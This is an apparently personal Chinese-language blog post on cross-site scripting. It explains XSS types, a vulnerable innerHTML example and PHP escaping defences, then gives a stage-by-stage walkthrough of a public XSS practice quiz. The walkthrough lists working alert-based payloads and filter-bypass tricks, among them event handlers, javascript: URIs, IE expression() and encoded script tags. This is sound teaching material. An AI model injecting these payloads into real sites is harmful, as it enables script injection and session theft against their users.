<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.3" rel="stylesheet" type="text/css" />



  <link rel="icon" type="image/png" sizes="32x32" href="/favicon.ico?v=5.1.3">







  <meta name="keywords" content="XSS," />










<meta name="description" content="XSS简单使用">
<meta name="keywords" content="XSS">
<meta property="og:type" content="article">
<meta property="og:title" content="XSS">
<meta property="og:url" content="http://www.lxhsec.com/2017/12/01/xss/index.html">
<meta property="og:site_name" content="lyxhh">
<meta property="og:description" content="XSS简单使用">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://owrmua5nw.bkt.clouddn.com/xss1.png">
<meta property="og:image" content="http://owrmua5nw.bkt.clouddn.com/xss2.png">
<meta property="og:image" content="http://owrmua5nw.bkt.clouddn.com/xss3.gif">
<meta property="og:image" content="http://owrmua5nw.bkt.clouddn.com/xss4.png">
<meta property="og:image" content="http://owrmua5nw.bkt.clouddn.com/x3.png">
<meta property="og:image" content="http://owrmua5nw.bkt.clouddn.com/x99.png">
<meta property="og:image" content="http://owrmua5nw.bkt.clouddn.com/xss12.png">
<meta property="og:image" content="http://owrmua5nw.bkt.clouddn.com/x13.png">
<meta property="og:updated_time" content="2017-12-03T05:30:13.418Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="XSS">
<meta name="twitter:description" content="XSS简单使用">
<meta name="twitter:image" content="http://owrmua5nw.bkt.clouddn.com/xss1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.3',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://www.lxhsec.com/2017/12/01/xss/"/>





  <title>XSS | lyxhh</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">lyxhh</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://www.lxhsec.com/2017/12/01/xss/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="lyxhh">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/1.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="lyxhh">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">XSS</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-12-01T19:08:25+08:00">
                2017-12-01
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/OWASP/" itemprop="url" rel="index">
                    <span itemprop="name">OWASP</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>XSS简单使用<a id="more"></a></p>
<h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p><img src="http://owrmua5nw.bkt.clouddn.com/xss1.png" alt="xss1"><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">XSS成效：js能做的事，xss都能做。</div><div class="line">范围：web页面客户端攻击。</div></pre></td></tr></table></figure></p>
<h2 id="分类"><a href="#分类" class="headerlink" title="分类"></a>分类</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">1.反射型    恶意代码只执行一次</div><div class="line"></div><div class="line">2.存储型    恶意代码存储在数据库中，若输出页面上，浏览器每刷新一次则解析一次。</div><div class="line"></div><div class="line">3.dom型 这是一种基于DOM树的XSS。</div><div class="line">例如服务器端经常使用document.boby.innerHtml等函数动态生成html页面，</div><div class="line">如果这些函数在引用某些变量时没有进行过滤或检查，就会产生DOM型的XSS。</div><div class="line">DOM型XSS可能是存储型，也有可能是反射型。</div></pre></td></tr></table></figure>
<h2 id="漏洞成因"><a href="#漏洞成因" class="headerlink" title="漏洞成因"></a>漏洞成因</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">输入的参数未进行过滤直接输出到网页上，被用户浏览器解析。</div></pre></td></tr></table></figure>
<h2 id="攻击场景"><a href="#攻击场景" class="headerlink" title="攻击场景"></a>攻击场景</h2><p>1.Reflected<br><img src="http://owrmua5nw.bkt.clouddn.com/xss2.png" alt="xss2"></p>
<p>2.Stored<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">存储在数据库，持久性，多出现于留言板，个人信息。</div></pre></td></tr></table></figure></p>
<p><img src="http://owrmua5nw.bkt.clouddn.com/xss3.gif" alt="xss3"></p>
<p>3.DOM<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div></pre></td><td class="code"><pre><div class="line">&lt;!DOCTYPE html&gt;</div><div class="line">&lt;html&gt;</div><div class="line">&lt;body&gt;</div><div class="line">&lt;script&gt;</div><div class="line">function xsstest()&#123;</div><div class="line">var str=document.getElementById(&quot;text&quot;).value;</div><div class="line">document.getElementById(&quot;t&quot;).innerHTML=&quot;&lt;a href=&apos; &quot;+str+&quot; &apos;&gt;testlink&lt;/a&gt;&quot;;</div><div class="line">&#125;</div><div class="line">&lt;/script&gt;</div><div class="line">&lt;input type=&quot;text&quot; id=&quot;text&quot; value=&quot;&quot;/&gt;</div><div class="line">&lt;input type=&quot;button&quot; value=&quot;write&quot; onclick=&quot;xsstest()&quot;&gt;</div><div class="line">&lt;div id=&apos;t&apos;&gt;&lt;/div&gt;</div><div class="line">&lt;/body&gt;</div><div class="line">&lt;/html&gt;</div></pre></td></tr></table></figure></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">源码：  &lt;a href=&apos;&apos;&gt;testlink&lt;/a&gt;</div><div class="line"></div><div class="line">payload： &apos;//&apos;&gt;&lt;img src=1 onerror=alert(&apos;xss&apos;);//</div><div class="line"></div><div class="line"></div><div class="line">合成: &lt;a href=&apos; &apos;//&apos;&gt;&lt;img src=1 onerror=alert(&apos;xss&apos;);// &apos;&gt;testlink&lt;/a&gt;</div><div class="line">&apos; 闭合前面标签//注释后面的&apos;</div></pre></td></tr></table></figure>
<p><img src="http://owrmua5nw.bkt.clouddn.com/xss4.png" alt="xss4"></p>
<h2 id="防御方法"><a href="#防御方法" class="headerlink" title="防御方法"></a>防御方法</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div></pre></td><td class="code"><pre><div class="line">在php中的防御。</div><div class="line"></div><div class="line">$name = htmlspecialchars( $_GET[ &apos;name&apos; ],ENT_QUOTES );</div><div class="line">过滤输入，把html标签实体化，ENT_QUOTES指单引号也需要转义。</div><div class="line"></div><div class="line">htmlspecialchars 函数 </div><div class="line"></div><div class="line">预定义的字符是： </div><div class="line"></div><div class="line">   &amp; （和号）成为 &amp;amp; </div><div class="line"></div><div class="line">   &quot; （双引号）成为 &amp;quot; </div><div class="line"></div><div class="line">   &apos; （单引号）成为 &amp;#039; </div><div class="line"></div><div class="line">   &lt; （小于）成为 &amp;lt; </div><div class="line"></div><div class="line">   &gt; （大于）成为 &amp;gt; </div><div class="line"></div><div class="line"></div><div class="line">set httponly防止cookie被盗取。</div><div class="line"></div><div class="line">PHP5</div><div class="line">setcookie(&quot;user&quot;,&quot;lxhsec&quot;,NULL,NULL,NULL,NULL,True)；</div><div class="line">最后一个参数为HttpOnly属性</div></pre></td></tr></table></figure>
<h2 id="XSS通关"><a href="#XSS通关" class="headerlink" title="XSS通关"></a>XSS通关</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">http://xss-quiz.int21h.jp/</div></pre></td></tr></table></figure>
<h3 id="1"><a href="#1" class="headerlink" title="1."></a>1.</h3><p><a href="http://xss-quiz.int21h.jp/?sid=2a75ff06e0147586b7ceb0fe68ee443b86a6e7b9" target="_blank" rel="external">第一关</a><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">&lt;script&gt;alert(document.domain)&lt;/script&gt;</div></pre></td></tr></table></figure></p>
<h3 id="2"><a href="#2" class="headerlink" title="2."></a>2.</h3><p><a href="http://xss-quiz.int21h.jp/stage2.php?sid=f2d7d60125bdddb208fa757ee5cdae22f6818cd1" target="_blank" rel="external">第二关</a><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">&quot;&lt;/input&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;&lt;input value=&quot;&quot;</div></pre></td></tr></table></figure></p>
<h3 id="3"><a href="#3" class="headerlink" title="3."></a>3.</h3><p><a href="http://xss-quiz.int21h.jp/stage-3.php?sid=93de7707279b3a5ae4ce419bfc7c0b1f380a20f6" target="_blank" rel="external">第三关</a><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">&lt;script&gt;alert(document.domain);&lt;/script&gt;</div><div class="line"></div><div class="line">前面的输入框实体化了html标签，故抓包在国家那里插xss，</div><div class="line">只要是输入的地方都可能存在漏洞。</div></pre></td></tr></table></figure></p>
<p><img src="http://owrmua5nw.bkt.clouddn.com/x3.png" alt="x3"></p>
<h3 id="4"><a href="#4" class="headerlink" title="4."></a>4.</h3><p><a href="http://xss-quiz.int21h.jp/stage_4.php?sid=be5650b31307cf0ca1927eae2e4b755d72a4162c" target="_blank" rel="external">第四关</a><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">抓包在参数p3处插入，需要闭合</div><div class="line">&quot;/&gt;&lt;script&gt;alert(document.domain);&lt;/script&gt;</div></pre></td></tr></table></figure></p>
<h3 id="5"><a href="#5" class="headerlink" title="5."></a>5.</h3><p><a href="http://xss-quiz.int21h.jp/stage--5.php?sid=92e1efdf82ec7681dc71fd4b5b15470cce1bbe27" target="_blank" rel="external">第五关</a><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">&quot;/&gt;&lt;script&gt;alert(document.domain);&lt;/script&gt; </div><div class="line">浏览器审查元素改长度。</div></pre></td></tr></table></figure></p>
<h3 id="6"><a href="#6" class="headerlink" title="6."></a>6.</h3><p><a href="http://xss-quiz.int21h.jp/stage-no6.php?sid=10284e95452262a58b13c86015336f4489b6152e" target="_blank" rel="external">第六关</a><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">123&quot; onfocusin=alert(document.domain)     autofocus x=&quot;</div><div class="line">123&quot; onfocusout=alert(document.domain)     autofocus x=&quot;</div><div class="line">123&quot; onblur=alert(document.domain) autofocus  x=&quot;</div></pre></td></tr></table></figure></p>
<h3 id="7"><a href="#7" class="headerlink" title="7."></a>7.</h3><p><a href="http://xss-quiz.int21h.jp/stage07.php?sid=2e71a47a9c7061dcce2b9205b52f4252bd53b443" target="_blank" rel="external">第七关</a><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">123&quot; onfocusin=alert(document.domain)     autofocus x=&quot;</div></pre></td></tr></table></figure></p>
<h3 id="8"><a href="#8" class="headerlink" title="8."></a>8.</h3><p><a href="http://xss-quiz.int21h.jp/stage008.php?sid=8407d42ea5cf46b072f5a358abffa591a449a2ba" target="_blank" rel="external">第八关</a><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">javascript:alert(document.domain); </div><div class="line"></div><div class="line">js伪协议</div></pre></td></tr></table></figure></p>
<h3 id="9"><a href="#9" class="headerlink" title="9."></a>9.</h3><p><a href="http://xss-quiz.int21h.jp/stage_09.php?sid=fcf3010be4306306e9668ee51b9d6916c0b3e129c" target="_blank" rel="external">第九关</a><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">&quot; onmousemove=&quot;alert(document.domain)</div><div class="line">这个它提示是时utf-7..但是我转码utf-7 +号也转成%2b了，还是没过去，不知道为啥，最后用firebug。</div></pre></td></tr></table></figure></p>
<p><img src="http://owrmua5nw.bkt.clouddn.com/x99.png" alt="x99"></p>
<h3 id="10"><a href="#10" class="headerlink" title="10."></a>10.</h3><p><a href="http://xss-quiz.int21h.jp/stage00010.php?sid=718360225fa9356a42c30995f38b5142c3496f6a" target="_blank" rel="external">第十关</a><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">&quot;&lt;/input&gt;&lt;script&gt;alert(document.dodomainmain)&lt;/script&gt;&lt;input value=&quot;</div></pre></td></tr></table></figure></p>
<h3 id="11"><a href="#11" class="headerlink" title="11."></a>11.</h3><p><a href="http://xss-quiz.int21h.jp/stage11th.php?sid=b0a460cbd0a1ced63918634d08b73d98306564c3" target="_blank" rel="external">第十一关</a><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">&quot;&lt;/input&gt;&lt;a href=&quot;javascr&amp;#09ipt:alert(document.domain);&quot;&gt;lxhsec&lt;/a&gt;&lt;input value=&quot;</div><div class="line"></div><div class="line">&amp;#09 制表符。换行符，回车符应该也是可以得。</div></pre></td></tr></table></figure></p>
<h3 id="12"><a href="#12" class="headerlink" title="12."></a>12.</h3><p><a href="http://xss-quiz.int21h.jp/stage_no012.php?sid=92cf5e7d054ddc022223097c5bb5f622b60ac857" target="_blank" rel="external">第十二关</a><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">``onmousemove=alert(document.domain);</div><div class="line"></div><div class="line">``这个要在ie中才会被解析。</div><div class="line">我测试的是ie版本为6.0</div></pre></td></tr></table></figure></p>
<p><img src="http://owrmua5nw.bkt.clouddn.com/xss12.png" alt="xss12"></p>
<h3 id="13"><a href="#13" class="headerlink" title="13."></a>13.</h3><p><a href="http://xss-quiz.int21h.jp/stage13_0.php?sid=d127ee28ee43f8387eb92452f94b4d33fb5b2463" target="_blank" rel="external">第十三关</a><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">background-color:salmon;width: expression(alert(document.domain));</div><div class="line"></div><div class="line">expression 也是ie中才有的。。。</div></pre></td></tr></table></figure></p>
<p><img src="http://owrmua5nw.bkt.clouddn.com/x13.png" alt="x13"></p>
<h3 id="14"><a href="#14" class="headerlink" title="14."></a>14.</h3><p><a href="http://xss-quiz.int21h.jp/stage-_-14.php?sid=88e5796eaebea97fe2b0cd79df9fbc9edad3ab9e" target="_blank" rel="external">第十四关</a><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">background-color:salmon;width: expres/*123*/sion(alert(document.domain));</div><div class="line"></div><div class="line">注释绕过。。</div></pre></td></tr></table></figure></p>
<h3 id="15"><a href="#15" class="headerlink" title="15."></a>15.</h3><p><a href="http://xss-quiz.int21h.jp/stage__15.php?sid=1e785fb96bdb203c00b034203ee574681d1b4403" target="_blank" rel="external">第十五关</a><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e</div><div class="line"></div><div class="line">\\ -&gt; \</div></pre></td></tr></table></figure></p>
<h3 id="16"><a href="#16" class="headerlink" title="16."></a>16.</h3><p><a href="http://xss-quiz.int21h.jp/stage00000016.php?sid=ef6e91b383462a2d0855b1611b49193b1940d8e6" target="_blank" rel="external">第十六关</a><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">hogehoge\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e</div><div class="line"></div><div class="line">js中不仅支持unicode 还支持八进制，十六进制。</div></pre></td></tr></table></figure></p>
<p>个人理解，仅供参考。</p>
<p><a href="http://www.freebuf.com/articles/web/20282.html" target="_blank" rel="external">参考资料</a></p>

      
    </div>
    
    
    

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者：</strong>
    lyxhh
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://www.lxhsec.com/2017/12/01/xss/" title="XSS">http://www.lxhsec.com/2017/12/01/xss/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>
    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/XSS/" rel="tag"><i class="fa fa-tag"></i>XSS</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/11/28/scrapy/" rel="next" title="Scrapy">
                <i class="fa fa-chevron-left"></i> Scrapy
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/12/03/django/" rel="prev" title="Django">
                Django <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      <div id="lv-container" data-id="city" data-uid="MTAyMC8zMjIyNy84Nzkx"></div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/1.jpg"
                alt="lyxhh" />
            
              <p class="site-author-name" itemprop="name">lyxhh</p>
              <p class="site-description motion-element" itemprop="description">有你给的阳光，没有理由绝望。</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">24</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">10</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">16</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          <div class="links-of-author motion-element">
            
          </div>

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.secbug.org/" title="破晓团队" target="_blank">破晓团队</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#简介"><span class="nav-number">1.</span> <span class="nav-text">简介</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#分类"><span class="nav-number">2.</span> <span class="nav-text">分类</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞成因"><span class="nav-number">3.</span> <span class="nav-text">漏洞成因</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#攻击场景"><span class="nav-number">4.</span> <span class="nav-text">攻击场景</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#防御方法"><span class="nav-number">5.</span> <span class="nav-text">防御方法</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS通关"><span class="nav-number">6.</span> <span class="nav-text">XSS通关</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1"><span class="nav-number">6.1.</span> <span class="nav-text">1.</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2"><span class="nav-number">6.2.</span> <span class="nav-text">2.</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3"><span class="nav-number">6.3.</span> <span class="nav-text">3.</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4"><span class="nav-number">6.4.</span> <span class="nav-text">4.</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5"><span class="nav-number">6.5.</span> <span class="nav-text">5.</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6"><span class="nav-number">6.6.</span> <span class="nav-text">6.</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#7"><span class="nav-number">6.7.</span> <span class="nav-text">7.</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#8"><span class="nav-number">6.8.</span> <span class="nav-text">8.</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#9"><span class="nav-number">6.9.</span> <span class="nav-text">9.</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#10"><span class="nav-number">6.10.</span> <span class="nav-text">10.</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#11"><span class="nav-number">6.11.</span> <span class="nav-text">11.</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#12"><span class="nav-number">6.12.</span> <span class="nav-text">12.</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#13"><span class="nav-number">6.13.</span> <span class="nav-text">13.</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#14"><span class="nav-number">6.14.</span> <span class="nav-text">14.</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#15"><span class="nav-number">6.15.</span> <span class="nav-text">15.</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#16"><span class="nav-number">6.16.</span> <span class="nav-text">16.</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">lyxhh</span>

  
</div>





        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.3"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.3"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.3"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.3"></script>



  


  




	





  





  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
